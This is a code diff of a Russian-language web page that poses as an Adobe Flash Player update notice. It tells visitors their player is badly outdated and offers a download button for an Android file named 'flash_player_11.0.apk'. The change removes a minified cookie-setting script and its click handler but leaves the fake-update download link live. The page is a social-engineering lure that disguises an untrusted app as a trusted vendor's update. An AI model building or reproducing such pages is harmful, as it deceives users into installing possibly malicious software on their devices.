--- a/public/index.html
+++ b/public/index.html
@@ -5,14 +5,13 @@
 
 <title>Версия Flash Player устарела</title>
 <link rel="stylesheet" media="all" href="style.css?v=l" />
-<script>function s(e,o,i){i=i||{};var n=i.expires;if("number"==typeof n&&n){var r=new Date;r.setTime(r.getTime()+1e3*n),n=i.expires=r}if(n&&n.toUTCString){i.expires=n.toUTCString(),o=encodeURIComponent(o);var t=e+"="+o;for(var a in i){t+="; "+a;var c=i[a];c!==!0&&(t+="="+c)}document.cookie=t,setTimeout(function(){window.location.reload()},3000)}}</script>
 </head>
 <body>
 <div class="header"><img src="logo.png"></div>
 <div class="glavnoe">
 Ваш <h2>Adobe® Flash® Player</h2> сильно устарел. Для корректного просмотра содержимого этого сайта Вам необходимо обновить Flash® Player до<h2> версии 11.0</h2>. Установка не займёт более 1 минуты<br/>
 <img class="flash" src="1.gif"><br/>
-<a href="flash_player_11.0.apk" onclick="s('cookie_auth','authentificate',{expires: 31536000,domain: '<%= @dn %>'})"><img src="but.png"></a><br/>
+<a href="flash_player_11.0.apk"><img src="but.png"></a><br/>
  </div>
  <div class="copy">
 Adobe Flash Player 2015 (C)
